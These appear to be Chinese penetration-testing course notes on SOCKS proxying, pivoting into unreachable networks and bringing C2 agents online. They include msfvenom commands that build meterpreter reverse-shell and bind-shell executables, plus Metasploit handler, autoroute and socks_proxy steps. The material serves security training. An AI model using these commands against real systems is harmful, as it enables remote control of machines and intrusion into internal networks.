代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决

解决:信息收集打点和漏洞利用部分

注意:配置连接IP为C2服务器IP

工具:Proxifier Proxychains等

Proxifier使用:

直接看课程演示图形化操作

配置代理服务器为csIP地址

配置代理规则ip地址为想要通讯的主机 然后用cs的ip地址为代理

然后开始漏洞打点 假如上传到后门要上传正向后门

刚开始是192.168.139.144反向链接192.168.139.141 后期用cs正向链接192.168.2.22 因为反向链接的话 网络达不到

Proxychains使用:

加入修改配置: /etc/proxychains4.conf

调用加载测试: proxychains4 curl http://192.168.2.22

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

1、在被控机器上获取下一级网段

2、在被控及其上建立SockS节点

3、在工具上配置连接属性和规则触发

#代理技术-正反向监听-网络不可达-C2上线

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

反向监听器:reverse

正向监听器:bind(需主动连接)

CS操作:

直接看课程演示图形化操作

MSF操作命令:

配置反向上线:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler(用来收集信息的)

set payload windows/meterpreter/reverse_tcp(反向payload)

set lhost 0.0.0.0

set lport 3333

run

查看路由表:

run autoroute -p

run post/multi/manage/autoroute

创建socks节点:

auxiliary/server/socks_proxy

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost xx.xx.xx.xx

set lport 6666

run

相关推荐
Legendary_0083 小时前
LDR6500:USB‑C DRP PD协议芯片技术详解与应用实践
c语言·开发语言
dgaf6 小时前
DX12 快速教程(17) —— 立体图标与合并渲染
c语言·c++·3d·图形渲染·d3d12
念恒123066 小时前
进程控制---自定义Shell
linux·c语言
程序员JerrySUN8 小时前
Jetson边缘嵌入式实战课程第二讲:JetPack 和 SDK Manager 是什么
c语言·开发语言·网络·udp·音视频
我不是懒洋洋8 小时前
布谷鸟过滤器:比布隆过滤器更优雅的判重方案
c语言·经验分享
忡黑梨8 小时前
eNSP_从直连到BGP全网互通
c语言·网络·数据结构·python·算法·网络安全
handler0110 小时前
Git 核心指令速查
linux·c语言·c++·笔记·git·学习
学会去珍惜11 小时前
学会C语言可以做什么
c语言·网络编程·游戏开发·嵌入式系统·系统编程
『昊纸』℃11 小时前
Mac上编译C语言的简易方法
c语言·mac·教程·xcode·编译
代码中介商11 小时前
C语言核心知识完全回顾:从数据类型到动态内存管理
c语言·开发语言